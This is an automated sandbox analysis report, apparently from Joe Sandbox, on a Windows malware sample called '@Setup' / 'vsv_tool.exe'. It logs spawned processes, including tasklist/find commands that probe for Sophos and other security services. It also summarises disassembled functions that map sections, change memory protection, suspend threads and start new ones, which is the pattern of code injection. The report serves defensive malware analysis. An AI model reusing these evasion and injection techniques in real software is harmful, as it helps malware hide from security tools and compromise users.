                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                            Start time:14:24:53
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                            Start time:14:24:53
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                                                                                                                                                                                            Imagebase:0x7ff762110000
                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                            Start time:14:24:53
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:find /I "nswscsvc.exe"
                                                                                                                                                                                            Imagebase:0x7ff7f6e90000
                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                            Start time:14:24:54
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                                                                                                                                                                                            Imagebase:0x7ff7692f0000
                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                            Start time:14:24:54
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                            Start time:14:24:54
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                                                                                                                                                                                            Imagebase:0x7ff762110000
                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                            Start time:14:24:54
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:find /I "sophoshealth.exe"
                                                                                                                                                                                            Imagebase:0x7ff7f6e90000
                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                            Start time:14:25:00
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe"
                                                                                                                                                                                            Imagebase:0x500000
                                                                                                                                                                                            File size:1'063'239'551 bytes
                                                                                                                                                                                            MD5 hash:C12ED31F29EF510393AE36661F44F102
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Disassembly

                                                                                                                                                                                            Reset < >

                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                              Execution Coverage:1.3%
                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                              Signature Coverage:31.6%
                                                                                                                                                                                              Total number of Nodes:117
                                                                                                                                                                                              Total number of Limit Nodes:10
                                                                                                                                                                                              execution_graph 13004 8f0351 13005 8f035f 13004->13005 13020 8f0ca1 13005->13020 13007 8f08ea 13008 8f04f7 GetPEB 13010 8f0574 13008->13010 13009 8f04b2 13009->13007 13009->13008 13023 8f0a61 13010->13023 13013 8f05d5 CreateThread 13014 8f05ad 13013->13014 13035 8f0911 GetPEB 13013->13035 13019 8f07e5 13014->13019 13031 8f0f61 GetPEB 13014->13031 13016 8f08d5 TerminateProcess 13016->13007 13017 8f0a61 4 API calls 13017->13019 13019->13016 13033 8f0cc1 GetPEB 13020->13033 13022 8f0cae 13022->13009 13024 8f0a77 CreateToolhelp32Snapshot 13023->13024 13026 8f05a7 13024->13026 13027 8f0aae Thread32First 13024->13027 13026->13013 13026->13014 13027->13026 13028 8f0ad5 13027->13028 13028->13026 13029 8f0b0c Wow64SuspendThread 13028->13029 13030 8f0b36 CloseHandle 13028->13030 13029->13030 13030->13028 13032 8f062f 13031->13032 13032->13017 13032->13019 13034 8f0cdc 13033->13034 13034->13022 13038 8f096a 13035->13038 13036 8f09ca CreateThread 13036->13038 13039 8f1141 13036->13039 13037 8f0a17 13038->13036 13038->13037 13042 93bb06 13039->13042 13043 93bc15 13042->13043 13044 93bb2b 13042->13044 13054 93cde1 13043->13054 13078 93e388 13044->13078 13047 93bb43 13048 93e388 LoadLibraryA 13047->13048 13053 8f1146 13047->13053 13049 93bb85 13048->13049 13050 93e388 LoadLibraryA 13049->13050 13051 93bba1 13050->13051 13052 93e388 LoadLibraryA 13051->13052 13052->13053 13055 93e388 LoadLibraryA 13054->13055 13056 93ce04 13055->13056 13057 93e388 LoadLibraryA 13056->13057 13058 93ce1c 13057->13058 13059 93e388 LoadLibraryA 13058->13059 13060 93ce3a 13059->13060 13061 93ce4f VirtualAlloc 13060->13061 13071 93ce63 13060->13071 13063 93ce7d 13061->13063 13061->13071 13062 93e388 LoadLibraryA 13065 93cefb 13062->13065 13063->13062 13075 93d0d6 13063->13075 13064 93e388 LoadLibraryA 13066 93cf51 13064->13066 13065->13066 13065->13071 13082 93e18f 13065->13082 13066->13064 13068 93cfb3 13066->13068 13066->13075 13068->13075 13077 93d015 13068->13077 13110 93bf71 13068->13110 13069 93d194 VirtualFree 13069->13071 13071->13053 13072 93cffe 13072->13075 13117 93c06c 13072->13117 13075->13069 13076 93d133 13075->13076 13076->13076 13077->13075 13086 93d511 13077->13086 13079 93e39f 13078->13079 13080 93e3c6 13079->13080 13136 93c48d 13079->13136 13080->13047 13085 93e1a4 13082->13085 13083 93e21a LoadLibraryA 13084 93e224 13083->13084 13084->13065 13085->13083 13085->13084 13087 93d54c 13086->13087 13088 93d593 NtCreateSection 13087->13088 13089 93d5b8 13087->13089 13109 93dbc0 13087->13109 13088->13089 13088->13109 13090 93d64d NtMapViewOfSection 13089->13090 13089->13109 13099 93d66d 13090->13099 13091 93d996 VirtualAlloc 13100 93d9d8 13091->13100 13092 93e18f LoadLibraryA 13092->13099 13093 93e18f LoadLibraryA 13098 93d8f4 13093->13098 13094 93da89 VirtualProtect 13095 93db54 VirtualProtect 13094->13095 13104 93daa9 13094->13104 13102 93db83 13095->13102 13096 93d992 13096->13091 13097 93e22d LoadLibraryA 13097->13099 13098->13091 13098->13093 13098->13096 13122 93e22d 13098->13122 13099->13092 13099->13097 13099->13098 13099->13109 13100->13094 13106 93da76 NtMapViewOfSection 13100->13106 13100->13109 13101 93dcce 13105 93dcd6 CreateThread 13101->13105 13101->13109 13102->13101 13102->13109 13126 93df42 13102->13126 13104->13095 13108 93db2e VirtualProtect 13104->13108 13105->13109 13106->13094 13106->13109 13108->13104 13109->13075 13111 93e18f LoadLibraryA 13110->13111 13112 93bf85 13111->13112 13113 93e22d LoadLibraryA 13112->13113 13116 93bf8d 13112->13116 13114 93bfa5 13113->13114 13115 93e22d LoadLibraryA 13114->13115 13114->13116 13115->13116 13116->13072 13118 93e18f LoadLibraryA 13117->13118 13119 93c082 13118->13119 13120 93e22d LoadLibraryA 13119->13120 13121 93c092 13120->13121 13121->13077 13123 93e35e 13122->13123 13124 93e248 13122->13124 13123->13098 13124->13123 13130 93c632 13124->13130 13129 93df6a 13126->13129 13127 93e15c 13127->13101 13128 93e22d LoadLibraryA 13128->13129 13129->13127 13129->13128 13133 93c651 13130->13133 13134 93c677 13130->13134 13131 93e18f LoadLibraryA 13132 93c684 13131->13132 13132->13123 13133->13132 13133->13134 13135 93e22d LoadLibraryA 13133->13135 13134->13131 13134->13132 13135->13133 13137 93c592 13136->13137 13138 93c4ad 13136->13138 13137->13079 13138->13137 13139 93c632 LoadLibraryA 13138->13139 13139->13137

                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                              Function 0093D511 Relevance: 12.7, APIs: 8, Instructions: 730memorynativethreadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 0093D5AA
                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,00000000), ref: 0093D652
                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0093D9C6
                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 0093DA7B
                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 0093DA98
                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 0093DB3B
                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 0093DB6E
                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0093DCDF
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Virtual$ProtectSection$CreateView$AllocThread
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1248616170-0
                                                                                                                                                                                              • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                                                              • Instruction ID: 107249f4f40db1a21ce4fd4dbb9a2d18b2f0195d073500f8e08aac01826bce3f
                                                                                                                                                                                              • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                                                              • Instruction Fuzzy Hash: EF428971609301AFDB24CF24D894B6BBBE9EF88704F14492DF9959B281E770E944CF92
                                                                                                                                                                                              Function 008F0A61 Relevance: 6.1, APIs: 4, Instructions: 100threadprocessCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 187 8f0a61-8f0aa8 CreateToolhelp32Snapshot 190 8f0b7e-8f0b81 187->190 191 8f0aae-8f0acf Thread32First 187->191 192 8f0b6a-8f0b79 191->192 193 8f0ad5-8f0adb 191->193 192->190 194 8f0add-8f0ae3 193->194 195 8f0b4a-8f0b64 193->195 194->195 196 8f0ae5-8f0b04 194->196 195->192 195->193 196->195 199 8f0b06-8f0b0a 196->199 200 8f0b0c-8f0b20 Wow64SuspendThread 199->200 201 8f0b22-8f0b31 199->201 202 8f0b36-8f0b48 CloseHandle 200->202 201->202 202->195
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,008F05A7,?,00000001,?,81EC8B55,000000FF), ref: 008F0A9F
                                                                                                                                                                                              • Thread32First.KERNEL32(00000000,0000001C), ref: 008F0ACB
                                                                                                                                                                                              • Wow64SuspendThread.KERNEL32(00000000), ref: 008F0B1E
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 008F0B48
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1849706056-0
                                                                                                                                                                                              • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                                                              • Instruction ID: 2e88d3081a021a95aa9a7eae5ec49ae6b5b4b270fa385b72d712a6bd5ee96043
                                                                                                                                                                                              • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                                                              • Instruction Fuzzy Hash: B1410C75A00108AFDB18DFA8C490BADB7B6FF88314F20C168E615DB795DA34AE45CF54
                                                                                                                                                                                              Function 008F0351 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 399threadCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 203 8f0351-8f04b9 call 8f0901 call 8f0f01 call 8f10b1 call 8f0ca1 212 8f04bf-8f04c6 203->212 213 8f08ea-8f08ed 203->213 214 8f04d1-8f04d5 212->214 215 8f04f7-8f0572 GetPEB 214->215 216 8f04d7-8f04f5 call 8f0e21 214->216 218 8f057d-8f0581 215->218 216->214 220 8f0599-8f05ab call 8f0a61 218->220 221 8f0583-8f0597 218->221 226 8f05ad-8f05d3 220->226 227 8f05d5-8f05f6 CreateThread 220->227 221->218 228 8f05f9-8f05fd 226->228 227->228 229 8f08be-8f08e8 TerminateProcess 228->229 230 8f0603-8f0636 call 8f0f61 228->230 229->213 230->229 235 8f063c-8f068b 230->235 237 8f0696-8f069c 235->237 238 8f069e-8f06a4 237->238 239 8f06e4-8f06e8 237->239 242 8f06b7-8f06bb 238->242 243 8f06a6-8f06b5 238->243 240 8f06ee-8f06fb 239->240 241 8f07b6-8f08a9 call 8f0a61 call 8f0901 call 8f0f01 239->241 244 8f0706-8f070c 240->244 269 8f08ae-8f08b8 241->269 270 8f08ab 241->270 245 8f06bd-8f06cb 242->245 246 8f06e2 242->246 243->242 249 8f070e-8f071c 244->249 250 8f073c-8f073f 244->250 245->246 251 8f06cd-8f06df 245->251 246->237 253 8f071e-8f072d 249->253 254 8f073a 249->254 255 8f0742-8f0749 250->255 251->246 253->254 257 8f072f-8f0738 253->257 254->244 255->241 259 8f074b-8f0754 255->259 257->250 259->241 261 8f0756-8f0766 259->261 263 8f0771-8f077d 261->263 265 8f077f-8f07ac 263->265 266 8f07ae-8f07b4 263->266 265->263 266->255 269->229 270->269
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 008F05F4
                                                                                                                                                                                              • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 008F08E8
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateProcessTerminateThread
                                                                                                                                                                                              • String ID: X@]
                                                                                                                                                                                              • API String ID: 1197810419-2528062196
                                                                                                                                                                                              • Opcode ID: 0ef861e82e90aebab19f5204b7c5d5a66f41f41450c1c6b8d65130b87485dae4
                                                                                                                                                                                              • Instruction ID: d2dd91805e415ea6b2a7d5ec64fe9ba167239ded2c7b1a635687c485a13371de
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ef861e82e90aebab19f5204b7c5d5a66f41f41450c1c6b8d65130b87485dae4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0212D2B4E00219DFDB14DFA8C990BADBBB1FF48304F2482A9D615AB386D7356A41CF54
                                                                                                                                                                                              Function 008F0911 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103threadCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 271 8f0911-8f0968 GetPEB 272 8f0973-8f0977 271->272 273 8f097d-8f0988 272->273 274 8f0a17-8f0a1e 272->274 276 8f098e-8f09a5 273->276 277 8f0a12 273->277 275 8f0a29-8f0a2d 274->275 281 8f0a2f-8f0a3c 275->281 282 8f0a3e-8f0a45 275->282 278 8f09ca-8f09e2 CreateThread 276->278 279 8f09a7-8f09c8 276->279 277->272 283 8f09e6-8f09ee 278->283 279->283 281->275 285 8f0a4e-8f0a53 282->285 286 8f0a47-8f0a49 282->286 283->277 288 8f09f0-8f0a0d 283->288 286->285 288->277
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 008F09DD
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateThread
                                                                                                                                                                                              • String ID: ,
                                                                                                                                                                                              • API String ID: 2422867632-3772416878
                                                                                                                                                                                              • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                                                              • Instruction ID: 364e1763f56b7f4467ab8e3ce2ab59be2e8a1444a55e8967ae627622c890f1cc
                                                                                                                                                                                              • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C41C474A0020DEFDB14CF98C994BAEBBB1FB48314F208198D515AB396D771AE81DF94
                                                                                                                                                                                              Function 0093E18F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66libraryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 290 93e18f-93e1a2 291 93e1a4-93e1a7 290->291 292 93e1ba-93e1c4 290->292 293 93e1a9-93e1ac 291->293 294 93e1d3-93e1df 292->294 295 93e1c6-93e1ce 292->295 293->292 296 93e1ae-93e1b8 293->296 297 93e1e2-93e1e7 294->297 295->294 296->292 296->293 298 93e21a-93e221 LoadLibraryA 297->298 299 93e1e9-93e1f4 297->299 300 93e224-93e228 298->300 301 93e210-93e214 299->301 302 93e1f6-93e20e call 93e85d 299->302 301->297 304 93e216-93e218 301->304 302->301 306 93e229-93e22b 302->306 304->298 304->300 306->300
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000,?,?), ref: 0093E221
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                              • String ID: .dll
                                                                                                                                                                                              • API String ID: 1029625771-2738580789
                                                                                                                                                                                              • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                                              • Instruction ID: 3ec6efd8553c84f4c3e39dc56b27397e249e723241b2d5aa84af608edee57ea5
                                                                                                                                                                                              • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2821B1766042859FEB21CFE9D844B6ABBECEF05320F18416DE8158BA81D730EC458F80
                                                                                                                                                                                              Function 0093CDE1 Relevance: 2.8, APIs: 2, Instructions: 325memoryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 307 93cde1-93ce45 call 93e388 * 3 314 93ce47-93ce49 307->314 315 93ce6f 307->315 314->315 316 93ce4b-93ce4d 314->316 317 93ce72-93ce7c 315->317 316->315 318 93ce4f-93ce61 VirtualAlloc 316->318 319 93ce63-93ce6a 318->319 320 93ce7d-93cea0 call 93e7fd call 93e821 318->320 319->315 321 93ce6c 319->321 326 93cea2-93ced8 call 93e4f5 call 93e3cb 320->326 327 93ceea-93cf03 call 93e388 320->327 321->315 336 93d139-93d142 326->336 337 93cede-93cee4 326->337 327->315 332 93cf09 327->332 335 93cf0f-93cf15 332->335 338 93cf51-93cf5a 335->338 339 93cf17-93cf1d 335->339 342 93d144-93d147 336->342 343 93d149-93d151 336->343 337->327 337->336 340 93cfb3-93cfbe 338->340 341 93cf5c-93cf62 338->341 344 93cf1f-93cf22 339->344 348 93cfc0-93cfc9 call 93c0d5 340->348 349 93cfd7-93cfda 340->349 345 93cf66-93cf81 call 93e388 341->345 342->343 346 93d180 342->346 343->346 347 93d153-93d17e call 93e821 343->347 350 93cf36-93cf38 344->350 351 93cf24-93cf29 344->351 369 93cf83-93cf8b 345->369 370 93cfa0-93cfb1 345->370 354 93d184-93d1a4 call 93e821 VirtualFree 346->354 347->354 359 93d135 348->359 372 93cfcf-93cfd5 348->372 358 93cfe0-93cfe9 349->358 349->359 350->338 357 93cf3a-93cf48 call 93e18f 350->357 351->350 356 93cf2b-93cf34 351->356 379 93d1a6 354->379 380 93d1aa-93d1ac 354->380 356->344 356->350 373 93cf4d-93cf4f 357->373 365 93cfeb 358->365 366 93cfef-93cff6 358->366 359->336 365->366 367 93d026-93d02a 366->367 368 93cff8-93d001 call 93bf71 366->368 377 93d030-93d052 367->377 378 93d0cc-93d0cf 367->378 384 93d003-93d009 368->384 385 93d00f-93d018 call 93c06c 368->385 369->359 375 93cf91-93cf9a 369->375 370->340 370->345 372->366 373->335 375->359 375->370 377->359 393 93d058-93d06b call 93e7fd 377->393 382 93d121-93d123 call 93d511 378->382 383 93d0d1-93d0d4 378->383 379->380 380->317 392 93d128-93d129 382->392 383->382 386 93d0d6-93d0d9 383->386 384->359 384->385 385->367 400 93d01a-93d020 385->400 390 93d0f2-93d103 call 93cbd2 386->390 391 93d0db-93d0dd 386->391 405 93d105-93d111 call 93d1b1 390->405 406 93d114-93d11f call 93c69e 390->406 391->390 396 93d0df-93d0e2 391->396 397 93d12a-93d131 392->397 408 93d08f-93d0c8 393->408 409 93d06d-93d071 393->409 401 93d0e4-93d0e7 396->401 402 93d0e9-93d0f0 call 93dd7f 396->402 397->359 403 93d133 397->403 400->359 400->367 401->397 401->402 402->392 403->403 405->406 406->392 408->359 419 93d0ca 408->419 409->408 411 93d073-93d076 409->411 411->378 414 93d078-93d08d call 93e600 411->414 414->419 419->378
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0093CE5B
                                                                                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 0093D19F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Virtual$AllocFree
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2087232378-0
                                                                                                                                                                                              • Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                                                                              • Instruction ID: d74eafdf7f9a41587b5becd7f81557d7dc76d075c219e4aab447238db4c289e5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                                                                              • Instruction Fuzzy Hash: CAB10171505B06ABDB35AEA0DC90BABB7ECFF49700F100929F98992141E731F961CFA1

                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                              Function 00926903 Relevance: 65.4, Strings: 52, Instructions: 388COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 421 926903-926cc7 422 926cc9-926cce 421->422 423 926cd0-926d35 422->423 424 926d37-926d70 422->424 423->422 425 926d72-926d7a 424->425 426 926d88-926df2 425->426 427 926d7c-926d86 425->427 428 926df4-926df7 426->428 427->425 429 926df9-926e2a 428->429 430 926e2c-926e5a 428->430 429->428 431 926e5c-926e64 430->431 432 926e72-926ece 431->432 433 926e66-926e70 431->433 434 926ed0-926ed3 432->434 433->431 435 926f06-926f25 434->435 436 926ed5-926f04 434->436 437 926f27-926f2a 435->437 436->434 438 926f69-926f6c 437->438 439 926f2c-926f67 437->439 440 926f6e-926f74 438->440 439->437 441 926f76 440->441 442 926f7b-926f8d 440->442 443 927000-927032 call 90620e * 2 441->443 444 926f91-926f97 442->444 445 926f8f 442->445 446 926ff1-926ff4 444->446 447 926f99-926fee call 92d29e 444->447 445->446 450 926ff6 446->450 451 926ff8-926ffb 446->451 447->446 450->443 451->440
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
